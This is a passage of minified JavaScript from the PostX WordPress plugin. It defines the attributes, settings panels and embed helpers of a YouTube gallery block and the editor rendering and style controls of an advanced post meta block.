{{iconSize}}; }"},{depends:[{key:"layout",condition:"!=",value:"playlist"},{key:"enableAnimation",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-ytg-play__icon svg { height: {{iconSize}}; width: {{iconSize}}; } {{ULTP}} .ultp-ytg-play__icon { height: calc({{iconSize}} + 20px); width: calc({{iconSize}} + 20px); }"}]},enableAnimation:{type:"boolean",default:!1},iconAnimationColor:{type:"string",default:"#fff",style:[{depends:[{key:"enableAnimation",condition:"==",value:!0}],selector:"{{ULTP}} { --ultp-pulse-color: {{iconAnimationColor}}; } "}]},loadMoreTypography:{type:"object",default:{openTypography:1,weight:"400",size:{lg:14,unit:"px"},height:{lg:26,unit:"px"},decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn"}]},loadMoreSpace:{type:"object",default:{lg:60,unit:"px"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn { margin-top: {{loadMoreSpace}} !important; }"}]},loadMoreColor:{type:"string",default:"#ffffff",style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn { color: {{loadMoreColor}}; }"}]},loadMoreBg:{type:"object",default:{openColor:1,type:"color",color:"#000",gradient:{}},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn"}]},loadMoreBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn"}]},loadMoreBorderRadius:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn { border-radius: {{loadMoreBorderRadius}}; }"}]},loadMoreShadow:{type:"object",default:{openShadow:0,width:{top:3,right:3,bottom:0,left:0},color:"#000"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn"}]},loadMoreHoverColor:{type:"string",default:"#ffffff",style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn:hover { color: {{loadMoreHoverColor}}; }"}]},loadMoreHoverBg:{type:"object",default:{openColor:1,type:"color",color:"rgba(119,119,119,1)",gradient:{}},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn:hover"}]},loadMoreHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn:hover"}]},loadMoreHoverRadius:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn:hover { border-radius: {{loadMoreHoverRadius}}; }"}]},loadMoreHoverShadow:{type:"object",default:{openShadow:0,width:{top:3,right:3,bottom:0,left:0},color:"#000"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn:hover"}]},loadMorePadding:{type:"object",default:{lg:{top:10,right:25,bottom:10,left:25},unit:"px"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn { padding: {{loadMorePadding}}; }"}]},advanceZindex:{type:"string",default:""},hideExtraLarge:{type:"boolean",default:!1},hideTablet:{type:"boolean",default:!1},hideMobile:{type:"boolean",default:!1},advanceCss:{type:"string",default:""},ytgLoadingColor:{type:"string",default:"#037fff",style:[{selector:"{{ULTP}} .ytg-loader::before { border-color:{{ytgLoadingColor}}; }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor","advanceId"],[{key:"wrapBg",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"},style:[{selector:"{{ULTP}} .ultp-wrapper-block"}]},{key:"wrapBorder",style:[{selector:"{{ULTP}} .ultp-wrapper-block"}]},{key:"wrapShadow",style:[{selector:"{{ULTP}} .ultp-wrapper-block"}]},{key:"wrapRadius",style:[{selector:"{{ULTP}} .ultp-wrapper-block { border-radius:{{wrapRadius}}; }"}]},{key:"wrapHoverBackground",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover"}]},{key:"wrapHoverBorder",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover"}]},{key:"wrapHoverRadius",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover { border-radius:{{wrapHoverRadius}}; }"}]},{key:"wrapHoverShadow",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover"}]},{key:"wrapMargin",style:[{selector:"{{ULTP}} .ultp-wrapper-block { margin:{{wrapMargin}}; }"}]},{key:"wrapOuterPadding",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-wrapper-block { padding:{{wrapOuterPadding}}; }"}]},{key:"advanceZindex",style:[{selector:"{{ULTP}} .ultp-wrapper-block { padding:{{wrapOuterPadding}}; }"}]}])}},68944:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(93673),n=l(79187),r=l(6947);l(16672);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks,p=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/youtube-gallery-block/","block_docs");s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/youtube-gallery.svg",alt:"PostX Youtube Gallery Block"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Display a customizable YouTube video gallery or playlist.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:p},__("Documentation","ultimate-post"))),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/youtube_gallery.svg"}},edit:i.Z,save:()=>null})},68533:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294),a=l(60448),i=l(53049),n=l(92637),r=l(43581);const{__}=wp.i18n,{InspectorControls:s}=wp.blockEditor,p=({store:e})=>{const{loadMoreEnable:t,galleryLayout:l}=e.attributes;return(0,o.createElement)(s,null,(0,o.createElement)(r.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid9096",store:e}),(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"general",title:__("General","ultimate-post")},(0,o.createElement)("div",{className:"ultp-preset-label-link ultp-youtube-dev-api-key",onClick:()=>(0,a.je)("typo")},"Configure Youtube Developer Key"),(0,o.createElement)(i.T,{initialOpen:!0,store:e,title:__("Settings","ultimate-post"),include:[{position:1,data:{type:"select",key:"sortBy",pro:!0,label:__("Sort By","ultimate-post"),options:[{value:"date",label:__("Date","ultimate-post")},{value:"relevance",label:__("Relevance","ultimate-post")},{value:"title",label:__("Title","ultimate-post")},{value:"popular",label:__("Most Popular","ultimate-post")},{value:"latest",label:__("Latest","ultimate-post")}]}},{position:3,data:{type:"text",key:"playlistIdOrUrl",label:__("Youtube Playlist URL/Channel ID","ultimate-post")}},{position:4,data:{type:"select",key:"cacheDuration",pro:!0,label:__("Cache Duration","ultimate-post"),options:[{value:"0",label:__("No Cache","ultimate-post")},{value:"3600",label:__("15 Min","ultimate-post")},{value:"86400",label:__("30 Min","ultimate-post")},{value:"604800",label:__("1 Hour","ultimate-post")},{value:"604800",label:__("1 day","ultimate-post")},{value:"604800",label:__("1 Week","ultimate-post")},{value:"604800",label:__("1 Month","ultimate-post")}]}}]}),(0,o.createElement)(i.T,{initialOpen:!0,store:e,title:__("Gallery Layout","ultimate-post"),include:[{position:1,data:{type:"layout",key:"layout",isInline:!1,label:__("Gallery Layout","ultimate-post"),options:[{value:"classic",img:"assets/img/layouts/yt_gallery/classic.svg",pro:!0,label:__("Classic","ultimate-post")},{value:"playlist",img:"assets/img/layouts/yt_gallery/playlist.svg",label:__("Playlist","ultimate-post"),pro:!0},{img:"assets/img/layouts/yt_gallery/inline.svg",value:"inline",label:__("Inline","ultimate-post"),pro:!1}]}},{position:1.1,data:{type:"range",key:"playlistHeight",label:__("Playlist Height","ultimate-post"),min:300,max:1e3,step:10,responsive:!0,unit:!1}},{position:3,data:{type:"range",key:"galleryColumn",min:1,max:6,step:1,responsive:!0,unit:!1,label:__("Gallery Column","ultimate-post")}},{position:4,data:{type:"range",key:"videosPerPage",label:__("Videos Per Page","ultimate-post"),min:1,max:50,step:1,responsive:!0}},{position:15,data:{type:"separator"}},{position:16,data:{type:"toggle",key:"loadMoreEnable",label:__("Load More Enable","ultimate-post")}},{position:17,data:{type:"text",key:"moreButtonLabel",label:__("More Button Label","ultimate-post")}}]}),(0,o.createElement)(i.T,{initialOpen:!1,store:e,title:__("Gallery Single Item","ultimate-post"),include:[{position:6,data:{type:"group",justify:!0,key:"displayType",label:__("Display ( Card/Item ) Type","ultimate-post"),options:[{value:"card",label:__("Card","ultimate-post")},{value:"overlay",label:__("Overlay","ultimate-post")}]}},{position:7,data:{type:"select",key:"imageHeightRatio",label:__("Thumbnail Height Ratio","ultimate-post"),options:[{value:"default",label:"Default"},{value:"high",label:"High"},{value:"maxres",label:"Maximum"},{value:"medium",label:"Medium"},{value:"standard",label:"Standard"}]}},{position:8,data:{type:"range",key:"customImgHeight",label:__("Image Height","ultimate-post"),min:0,max:1e3,step:1,responsive:!0}},{position:9,data:{type:"range",key:"customImgHeightLg",label:__("Large Image Height","ultimate-post"),min:0,max:1e3,step:1,responsive:!0}},{position:10,data:{type:"separator"}},{position:11,data:{type:"toggle",key:"showVideoTitle",label:__("Show Video Title","ultimate-post")}},{position:12,data:{type:"range",key:"videoTitleLength",label:__("Video Title Length","ultimate-post"),min:0,max:200,step:1,responsive:!0}},{position:13,data:{type:"toggle",key:"showDescription",label:__("Show Description","ultimate-post")}},{position:14,data:{type:"range",key:"videoDescriptionLength",label:__("Video Description Length","ultimate-post"),min:0,max:500,step:1,responsive:!0}}]}),(0,o.createElement)(i.T,{initialOpen:!1,store:e,title:__("Video/Player Options","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"autoplay",label:__("Autoplay","ultimate-post")}},{position:2,data:{type:"toggle",key:"autoplayPlaylist",label:__("Autoplay","ultimate-post")}},{position:3,data:{type:"toggle",key:"loop",label:__("Loop","ultimate-post")}},{position:4,data:{type:"toggle",key:"mute",label:__("Mute","ultimate-post")}},{position:5,data:{type:"toggle",key:"showPlayerControl",label:__("Show Player Control","ultimate-post")}}]})),(0,o.createElement)(n.Section,{slug:"style",title:__("Style","ultimate-post")},(0,o.createElement)(i.T,{initialOpen:!0,store:e,title:__("Gallery","ultimate-post"),include:[{position:1,data:{type:"range",key:"gutterSpace",label:__("Gutter Space","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:2,data:{type:"border",key:"galleryItemBorder",label:__("Image Border","ultimate-post")}},{position:3,data:{type:"dimension",key:"itemBorderRadius",label:__("Image Border Radius","ultimate-post"),responsive:!0}},{position:4,data:{type:"range",key:"imageSpace",label:__("Image Space","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:5,data:{type:"boxshadow",key:"imgShadow",label:__("Image shadow","ultimate-post")}},{position:5,data:{type:"boxshadow",key:"imgHoverShadow",label:__("Image Hover shadow","ultimate-post")}},{position:6,data:{type:"group",key:"imgScale",justify:!0,options:[{value:"cover",label:__("Cover","ultimate-post")},{value:"contain",label:__("Container","ultimate-post")},{value:"fill",label:__("Fill","ultimate-post")}],label:__("Image Scale","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),(0,o.createElement)(i.T,{initialOpen:!1,store:e,title:__("Title & Description & Content","ultimate-post"),include:[{position:1,data:{type:"typography",key:"titleTypography",label:__("Title Typography","ultimate-post")}},{position:2,data:{type:"typography",key:"titleTypographySmall",label:__("Small Title Typography","ultimate-post")}},{position:3,data:{type:"typography",key:"descTypography",label:__("Description Typography","ultimate-post")}},{position:4,data:{type:"separator"}},{position:5,data:{type:"color",key:"titleColor",label:__("Title Color","ultimate-post")}},{position:6,data:{type:"color",key:"titleColorLg",label:__("Small Title Color","ultimate-post")}},{position:7,data:{type:"color",key:"titleHoverColor",label:__("Title Hover Color","ultimate-post")}},{position:8,data:{type:"color",key:"titleHoverColorSm",label:__("Small Title Hover Color","ultimate-post")}},{position:9,data:{type:"color",key:"descColor",label:__("Description Color","ultimate-post")}},{position:9.1,data:{type:"separator"}},{position:10,data:{type:"range",key:"spaceTop",label:__("Desc. Space Top","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:11,data:{type:"color2",key:"contentBg",label:__("Content Background","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:12,data:{type:"color2",key:"singleContentBg",label:__("Single Content Background","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:13,data:{type:"dimension",responsive:!0,key:"contentPadding",label:__("Content Padding","ultimate-post")}},{position:14,data:{type:"dimension",key:"contentRadius",step:1,responsive:!0,label:__("Content Radius","ultimate-post")}}]}),(0,o.createElement)(i.T,{initialOpen:!1,store:e,title:__("Play Icon & Style","ultimate-post"),include:[{position:0,data:{type:"toggle",key:"defaultYoutubeIcon",pro:!0,label:__("Default Youtube Icon","ultimate-post")}},{position:1,data:{type:"icon",key:"playIcon",label:__("Icon","ultimate-post")}},{position:2,data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{position:3,data:{type:"color",key:"iconHoverColor",label:__("Hover Color","ultimate-post")}},{position:6,data:{type:"range",key:"iconSize",label:__("Icon Size","ultimate-post"),min:0,max:150,step:1,responsive:!0}},{position:7,data:{type:"toggle",key:"enableAnimation",pro:!0,label:__("Icon Animation","ultimate-post")}},{position:8,data:{type:"color",key:"iconAnimationColor",label:__("Animation Color","ultimate-post")}}]}),t&&"playlist"!=l&&(0,o.createElement)(i.T,{initialOpen:!1,store:e,title:__("Load More","ultimate-post"),include:[{position:1,data:{type:"typography",key:"loadMoreTypography",label:__("Typography","ultimate-post")}},{position:2,data:{type:"tab",content:[{title:__("Normal","ultimate-post"),name:"normal",options:[{type:"color",key:"loadMoreColor",label:__("Color","ultimate-post")},{type:"color2",key:"loadMoreBg",label:__("Background","ultimate-post")},{type:"border",key:"loadMoreBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"loadMoreBorderRadius",responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"loadMoreShadow",step:1,unit:!0,responsive:!0,label:__("Image Box shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"loadMoreHoverColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"loadMoreHoverBg",label:__("Hover Background","ultimate-post")},{type:"border",key:"loadMoreHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",responsive:!0,key:"loadMoreHoverRadius",label:__("Hover Border Radius","ultimate-post")},{type:"boxshadow",key:"loadMoreHoverShadow",step:1,unit:!0,responsive:!0,label:__("Load More Box Shadow","ultimate-post")}]}]}},{position:3,data:{type:"dimension",responsive:!0,key:"loadMorePadding",label:__("Padding","ultimate-post")}},{position:4,data:{type:"range",key:"loadMoreSpace",label:__("Space Between","ultimate-post"),min:0,max:100,step:1,responsive:!0}}]})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post"),include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post")}}]},(0,o.createElement)(i.yB,{initialOpen:!0,store:e}),(0,o.createElement)(i.Mg,{pro:!0,store:e}),(0,o.createElement)(i.iv,{store:e}))))}},60307:(e,t,l)=>{"use strict";l.d(t,{Qc:()=>r,Y7:()=>i,aF:()=>a,eT:()=>s,v8:()=>n});var o=l(67294);function a(e,t){if(!e)return"";const l=window.innerWidth;let o;return o=l<600?t.sm:l<900?t.md:t.lg,e.length>o?e.substring(0,o)+"...":e}const i=({video:e,autoplay:t=!1,loop:l=!1,mute:a=!1,showPlayerControl:i=!0,hideYoutubeLogo:n=!1,showVideoTitle:r=!0,showDescription:p=!1,videoTitleLength:c={lg:50,md:50,sm:50},videoDescriptionLength:u={lg:100,md:100,sm:100},onlyVideo:d=!1})=>{if(!e)return null;const m=["autoplay="+(t?1:0),"loop="+(l?1:0),"mute="+(a?1:0),"controls="+(i?1:0)];n&&(m.push("modestbranding=1"),m.push("rel=0"),m.push("showinfo=0")),l&&m.push(`playlist=${e.videoId}`);const g=`https://www.youtube.com/embed/${e.videoId}?${m.join("&")}`;return(0,o.createElement)("div",{className:"ultp-ytg-video-wrapper"},(0,o.createElement)("iframe",{src:g,title:e.title,frameBorder:"0",allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture",allowFullScreen:!0}),!d&&s(r,e.title,c,p,e.description,u,e.videoId))};function n(e){if(!e)return"";try{return new URL(e).searchParams.get("list")||e}catch(t){return e}}function r(e,t){switch(t){case"title":return[...e].sort(((e,t)=>e.title.localeCompare(t.title,void 0,{sensitivity:"base"})));case"latest":return[...e].sort(((e,t)=>new Date(t.publishedAt).getTime()-new Date(e.publishedAt).getTime()));case"date":return[...e].sort(((e,t)=>new Date(e.publishedAt).getTime()-new Date(t.publishedAt).getTime()));case"popular":return[...e].sort(((e,t)=>(t.viewCount||0)-(e.viewCount||0)));default:return e}}const s=(e,t,l,i,n,r,s)=>(0,o.createElement)("div",{className:"ultp-ytg-content"},e&&(0,o.createElement)("div",{className:"ultp-ytg-title"},(0,o.createElement)("a",{href:`https://www.youtube.com/watch?v=${s}`,target:"_blank",rel:"noopener noreferrer"},a(t,l))),i&&(0,o.createElement)("div",{className:"ultp-ytg-description"},a(n,r)))},85977:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(64766),s=l(2207);const{__}=wp.i18n,{Fragment:p}=wp.element,{InspectorControls:c,useBlockProps:u}=wp.blockEditor,{dateI18n:d}=wp.date;function m(e){const{setAttributes:t,name:l,attributes:m,clientId:y,className:b}=e,{blockId:v,advanceId:h,dateText:f,tagLabel:k,tagLabelShow:w,catLabelShow:x,catLabel:T,viewLabel:_,viewLabelShow:C,cmtLabel:E,cmtLabelShow:S,datePubText:P,authorShow:L,readTimeShow:I,dateShow:B,viewCountShow:U,cmtCountShow:M,catShow:A,tagShow:H,authLabel:N,metaSeparator:j,authLabelShow:Z,readTimeText:O,authImgShow:R,readTimePrefix:D,authIconShow:z,DateIconShow:F,readTimeIcon:W,viewIconShow:V,cmtIconShow:G,metaItemSort:q,catAlign:$,tagAlign:K,cmntAlign:J,viewAlign:Y,readAlign:X,authAlign:Q,dateAlign:ee,catIconShow:te,catIconStyle:le,tagIconShow:oe,tagIconStyle:ae,cmntIconStyle:ie,viewIconStyle:ne,readIconStyle:re,authIconStyle:se,dateIconStyle:pe,dateFormat:ce,metaDateFormat:ue,enablePrefix:de,currentPostId:me}=m,ge={setAttributes:t,name:l,attributes:m,clientId:y};(0,n.S)({blockId:v,clientId:y,currentPostId:me,setAttributes:t,checkRef:!1}),v&&(0,i.Kh)(m,"ultimate-post/advance-post-meta",v);const ye=$||K||J||Y||X||Q||ee,be=(0,o.createElement)("span",{className:"ultp-post-auth ultp-meta-separator"},(0,o.createElement)("span",{className:"ultp-auth-heading"},R&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-author.jpg",alt:"author-img"}),z&&r.ZP[se],Z&&(0,o.createElement)("span",{className:"ultp-auth-label"},N)),(0,o.createElement)("span",{className:"ultp-auth-name"},"Sapiente Delectus")),ve=(0,o.createElement)("span",{className:"ultp-date-meta ultp-meta-separator"},F&&(0,o.createElement)("span",{className:"ultp-date-icon"},r.ZP[pe]),"updated"==ce&&(0,o.createElement)(p,null,de&&(0,o.createElement)("span",{className:"ultp-date-prefix"},f),(0,o.createElement)("span",{className:"ultp-post-date__val"},d((0,a.De)(ue)))),"publish"==ce&&(0,o.createElement)(p,null,de&&(0,o.createElement)("span",{className:"ultp-date-prefix"},P),(0,o.createElement)("span",{className:"ultp-post-date__val"},d((0,a.De)(ue))))),he=u({className:`ultp-block-${v} ${b}`,...h&&{id:h}});return(0,o.createElement)(p,null,(0,o.createElement)(c,null,(0,o.createElement)(s.Z,{store:ge}),(0,a.dH)()),(0,o.createElement)("div",he,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:`ultp-advance-post-meta ${ye?"ultp-contentMeta-align":"ultp-contentMeta"} ultp-post-meta-${j}`},(0,o.createElement)("div",null,q.map(((e,t)=>(0,o.createElement)(p,{key:e},"author"==e&&L&&!Q&&be,"date"==e&&B&&!ee&&ve,"cmtCount"==e&&M&&!J&&(0,o.createElement)(g,{key:e,title:"comment",labelEnable:S,labelText:E,iconEnable:G,iconVal:ie}),"viewCount"==e&&U&&!Y&&(0,o.createElement)(g,{key:e,title:"view",labelEnable:C,labelText:_,iconEnable:V,iconVal:ne}),"readTime"==e&&I&&!X&&(0,o.createElement)(g,{key:e,title:"readTime",labelEnable:D,labelText:O,iconEnable:W,iconVal:re}),"cat"==e&&A&&!$&&(0,o.createElement)(g,{title:"cat",key:e,labelEnable:x,labelText:T,iconEnable:te,iconVal:le}),"tag"==e&&H&&!K&&(0,o.createElement)(g,{key:e,title:"tag",labelEnable:w,labelText:k,iconEnable:oe,iconVal:ae}))))),(0,o.createElement)("div",null,ye&&q.map(((e,t)=>(0,o.createElement)(p,{key:e+"sort"},"author"==e&&L&&Q&&be,"date"==e&&B&&ee&&ve,"cmtCount"==e&&M&&J&&(0,o.createElement)(g,{key:e,title:"comment",labelEnable:S,labelText:E,iconEnable:G,iconVal:ie}),"viewCount"==e&&U&&Y&&(0,o.createElement)(g,{key:e,title:"view",labelEnable:C,labelText:_,iconEnable:V,iconVal:ne}),"readTime"==e&&I&&X&&(0,o.createElement)(g,{key:e,title:"readTime",labelEnable:D,labelText:O,iconEnable:W,iconVal:re}),"cat"==e&&A&&$&&(0,o.createElement)(g,{title:"cat",key:e,labelEnable:x,labelText:T,iconEnable:te,iconVal:le}),"tag"==e&&H&&K&&(0,o.createElement)(g,{key:e,title:"tag",labelEnable:w,labelText:k,iconEnable:oe,iconVal:ae})))))))))}const g=({title:e,labelEnable:t,labelText:l,iconEnable:a,iconVal:i})=>{const n="tag"==e||"cat"==e,s="readTime"==e;return(0,o.createElement)("span",{className:`ultp-${e}-wrap ultp-meta-separator`},n&&(0,o.createElement)("span",{className:`ultp-${e}-count`},a&&r.ZP[i]),n&&t&&(0,o.createElement)("span",{className:`ultp-${e}-label`},l),n&&(0,o.createElement)("span",{className:`ultp-post-${e}`},(0,o.createElement)("a",null,"Example",e)," ",(0,o.createElement)("a",null,"Example",e)),!n&&!s&&(0,o.createElement)("span",{className:`ultp-${e}-count`},a&&r.ZP[i]," 12"),s&&a&&r.ZP[i],!n&&!s&&t&&(0,o.createElement)("span",{className:`ultp-${e}-label`},l),s&&(0,o.createElement)(p,null,(0,o.createElement)("div",null,"12"),t&&(0,o.createElement)("span",{className:"ultp-read-label"},l)))}},2207:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n;function n({store:e}){const t=e||{name:"ultimate-post/post-title",attributes:{}};return(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:"inline",include:[{data:{type:"range",key:"metaSpacing",label:__("Item Spacing","ultimate-post"),min:0,max:50,step:1,unit:!0,responsive:!0}},{data:{type:"alignment",key:"metaAlign",disableJustify:!0,label:__("Alignment","ultimate-post")}},{data:{type:"select",key:"metaSeparator",label:__("Separator","ultimate-post"),options:[{value:"dot",label:__("Dot","ultimate-post")},{value:"slash",label:__("Slash","ultimate-post")},{value:"doubleslash",label:__("Double Slash","ultimate-post")},{value:"close",label:__("Close","ultimate-post")},{value:"dash",label:__("Dash","ultimate-post")},{value:"verticalbar",label:__("Vertical Bar","ultimate-post")},{value:"emptyspace",label:__("Empty","ultimate-post")}]}},{data:{type:"color",key:"separatorColor",label:__("Separator Color","ultimate-post")}},{data:{type:"color",key:"metaCommonColor",label:__("Common Color","ultimate-post")}},{data:{type:"typography",key:"commonTypo",label:__("Common Typography","ultimate-post")}},{data:{type:"sort",key:"metaItemSort",label:__("Meta List","ultimate-post"),options:{author:{label:__("Post Author","ultimate-post"),action:"authorShow",inner:[{type:"color",key:"authColor",label:__("Author Color","ultimate-post")},{type:"color",key:"authHovColor",label:__("Hover Color","ultimate-post")},{type:"typography",key:"authTypo",label:__("Typography","ultimate-post")},{type:"separator",label:"Avatar"},{type:"toggle",key:"authImgShow",label:__("Author Avatar","ultimate-post")},{type:"range",key:"authImgSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")},{type:"range",key:"authImgRadius",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Radius","ultimate-post")},{type:"range",key:"authImgSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")},{type:"separator",label:"Label"},{type:"toggle",key:"authLabelShow",label:__("Author Label","ultimate-post")},{type:"text",key:"authLabel",label:__("Author Label Text","ultimate-post")},{type:"color",key:"authLabelColor",label:__("Label Color","ultimate-post")},{type:"typography",key:"authLabelTypo",label:__("Typography","ultimate-post")},{type:"range",key:"authLabelSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")},{type:"separator",label:"Icon"},{type:"toggle",key:"authIconShow",pro:!0,label:__("Enable Icon","ultimate-post")},{type:"icon",key:"authIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"authIconColor",label:__("Icon Color","ultimate-post")},{type:"range",key:"authIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")},{type:"range",key:"authIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"authAlign",label:__("Right Align","ultimate-post")}]},date:{label:__("Post Publish Date","ultimate-post"),action:"dateShow",inner:[{type:"group",key:"dateFormat",options:[{value:"publish",label:"Publish Date"},{value:"updated",label:"Updated Date"}],justify:!0,label:__("Date Format","ultimate-post")},{type:"select",key:"metaDateFormat",label:__("Date/Time Format","ultimate-post"),options:[{value:"M j, Y",label:"Feb 7, 2022"},{value:"default_date",label:"WordPress Default Date Format",pro:!0},{value:"default_date_time",label:"WordPress Default Date & Time Format",pro:!0},{value:"g:i A",label:"1:12 PM",pro:!0},{value:"F j, Y",label:"February 7, 2022",pro:!0},{value:"F j, Y g:i A",label:"February 7, 2022 1:12 PM",pro:!0},{value:"M j, Y g:i A",label:"Feb 7, 2022 1:12 PM",pro:!0},{value:"j M Y",label:"7 Feb 2022",pro:!0},{value:"j M Y g:i A",label:"7 Feb 2022 1:12 PM",pro:!0},{value:"j F Y",label:"7 February 2022",pro:!0},{value:"j F Y g:i A",label:"7 February 2022 1:12 PM",pro:!0},{value:"j. M Y",label:"7. Feb 2022",pro:!0},{value:"j. M Y | H:i",label:"7. Feb 2022 | 1:12",pro:!0},{value:"j. F Y",label:"7. February 2022",pro:!0},{value:"j.m.Y",label:"7.02.2022",pro:!0},{value:"j.m.Y g:i A",label:"7.02.2022 1:12 PM",pro:!0},{value:"Y m j",label:"2022 7 02",pro:!0}]},{type:"color",key:"dateColor",label:__("Color","ultimate-post")},{type:"typography",key:"dateTypo",label:__("Typography","ultimate-post")},{type:"separator",label:"Prefix"},{type:"toggle",key:"enablePrefix",label:__("Enable Prefix","ultimate-post")},{type:"text",key:"datePubText",label:__("Date Text","ultimate-post")},{type:"text",key:"dateText",label:__("Date Text","ultimate-post")},{type:"color",key:"datePrefixColor",label:__("Color","ultimate-post")},{type:"separator",label:"Icon"},{type:"toggle",key:"DateIconShow",label:__("Date Icon","ultimate-post")},{type:"icon",key:"dateIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"dateIconColor",label:__("Color","ultimate-post")},{type:"range",key:"dateIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")},{type:"range",key:"dateIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"dateAlign",label:__("Right Align","ultimate-post")}]},cmtCount:{label:__("Comments","ultimate-post"),action:"cmtCountShow",inner:[{type:"color",key:"commentColor",label:__("Color","ultimate-post")},{type:"color",key:"commentHovColor",label:__("Hover Color","ultimate-post")},{type:"typography",key:"commentTypo",label:__("Typography","ultimate-post")},{type:"separator",label:"Prefix"},{type:"toggle",key:"cmtLabelShow",label:__("Prefix Enable","ultimate-post")},{type:"text",key:"cmtLabel",label:__("Prefix Text","ultimate-post")},{type:"color",key:"cmtLabelColor",label:__("Prefix Color","ultimate-post")},{type:"group",key:"commentLabelAlign",options:[{label:"After Content",value:"after"},{label:"Before Content",value:"before"}],justify:!0,label:__("Prefix Position","ultimate-post")},{type:"separator",label:"Icon"},{type:"toggle",key:"cmtIconShow",pro:!0,label:__("Enable Icon","ultimate-post")},{type:"icon",key:"cmntIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"cmntIconColor",label:__("Icon Color","ultimate-post")},{type:"range",key:"commentIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")},{type:"range",key:"cmntIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"cmntAlign",label:__("Right Align","ultimate-post")}]},viewCount:{label:__("Views","ultimate-post"),action:"viewCountShow",inner:[{type:"color",key:"viewColor",label:__("Color","ultimate-post")},{type:"color",key:"viewHovColor",label:__("Hover Color","ultimate-post")},{type:"typography",key:"viewTypo",label:__("Typography","ultimate-post")},{type:"separator",label:"Prefix"},{type:"toggle",key:"viewLabelShow",label:__("Enable Prefix","ultimate-post")},{type:"text",key:"viewLabel",label:__("Prefix Text","ultimate-post")},{type:"color",key:"viewLabelColor",label:__("Prefix Color","ultimate-post")},{type:"group",key:"viewLabelAlign",options:[{label:"After Content",value:"after"},{label:"Before Content",value:"before"}],justify:!0,label:__("Prefix 